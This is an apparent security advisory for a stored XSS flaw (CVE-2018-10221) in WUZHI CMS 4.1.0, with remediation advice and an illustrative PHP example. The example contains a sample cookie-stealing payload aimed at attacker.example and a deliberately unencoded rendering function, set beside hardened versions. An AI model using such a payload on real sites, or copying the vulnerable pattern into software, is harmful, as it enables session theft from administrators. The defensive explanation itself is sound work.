Wuzhi · Wuzhi Cms · CVE-2018-10221
Name of the Vulnerable Software and Affected Versions:
WUZHI CMS version 4.1.0
Description:
A stored (persistent) XSS issue in WUZHI CMS 4.1.0 allows stealing administrator cookies via the `tag` parameter of the "index.php?m=tags&f=index&v=add&&_su=wuzhicms" endpoint. The tag value is saved without sanitisation and later rendered, unencoded, in pages viewed by the administrator. An authenticated website editor, whose privileges are lower than the administrator's, can therefore add a new tag whose name carries a script payload; the payload executes in the administrator's browser the next time the tag list is displayed, and can exfiltrate the admin session cookie unless that cookie is HttpOnly.
Recommendations:
For WUZHI CMS version 4.1.0, as a temporary workaround, restrict access to the "index.php?m=tags&f=index&v=add&&_su=wuzhicms" endpoint to administrators only, so that lower-privileged editors cannot create tags. If tag creation by editors is required, validate the `tag` parameter on input (reject values containing `<`, `>`, quotes or other markup characters) and, more importantly, HTML-encode tag names wherever they are rendered in the back end, since output encoding is the fix that actually removes the XSS. Reduce the impact of any remaining injection by marking the session cookie HttpOnly and Secure and by adding a Content-Security-Policy header to the administration pages. Audit existing tags for injected markup before applying these changes. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
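The example below is added here to illustrate the vulnerable pattern the description refers to and the hardening the recommendations call for. It is not WUZHI CMS code and does not reproduce the project's real templates or functions: the two `render_tag_row_*` functions, `html_text`, `is_acceptable_tag`, `harden_session_cookie` and the sample tag value are all hypothetical, constructed for illustration. The same output-encoding discipline applies to any other user-controlled field rendered in the admin UI, not only to `tag`.

```php
<?php
// Added illustrative example. NOT WUZHI CMS's own code: it models the stored-XSS
// pattern the advisory describes (a tag name saved by a low-privilege editor and
// later rendered in an administrator page) next to the hardened equivalent.

declare(strict_types=1);

// Constructed sample input: what an editor might submit through the `tag` parameter.
// The onerror handler sends document.cookie to a host the attacker controls.
$submittedTag = '<img src=x onerror="new Image().src=\'http://attacker.example/?c=\'+document.cookie">';

// --- Vulnerable rendering (hypothetical) ---
// The stored tag is concatenated into the admin tag list unencoded, so the browser
// parses the <img> element and runs the injected handler.
function render_tag_row_vulnerable(string $tag): string
{
    return '<tr><td>' . $tag . '</td></tr>';
}

// --- Hardened rendering ---
// Encode at the output boundary for the HTML text context. ENT_QUOTES also encodes
// single quotes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function html_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_tag_row_safe(string $tag): string
{
    return '<tr><td>' . html_text($tag) . '</td></tr>';
}

// Optional input-side policy (hypothetical, not WUZHI's validation): a tag is a short
// run of letters, digits, spaces, underscores and hyphens. Input filtering reduces
// exposure but does not replace output encoding, which remains mandatory.
function is_acceptable_tag(string $tag): bool
{
    return $tag !== ''
        && mb_strlen($tag, 'UTF-8') <= 64
        && preg_match('/^[\p{L}\p{N} _\-]+$/u', $tag) === 1;
}

// Session-cookie hardening; call before session_start(). HttpOnly keeps document.cookie
// from exposing the session id, which is exactly what the payload above tries to read.
function harden_session_cookie(bool $https): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => $https,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

harden_session_cookie(true);

echo "Vulnerable row: " . render_tag_row_vulnerable($submittedTag) . PHP_EOL;
echo "Hardened row:   " . render_tag_row_safe($submittedTag) . PHP_EOL;
echo "Accepted by input policy: " . (is_acceptable_tag($submittedTag) ? 'yes' : 'no') . PHP_EOL;
```

Running the script shows the hardened row with `&lt;img src=x onerror=...&gt;`, which the browser displays as text instead of executing, and the input policy rejecting the sample tag. The cookie settings only limit what a successful injection can steal; they are defence in depth, not a substitute for encoding the tag on output.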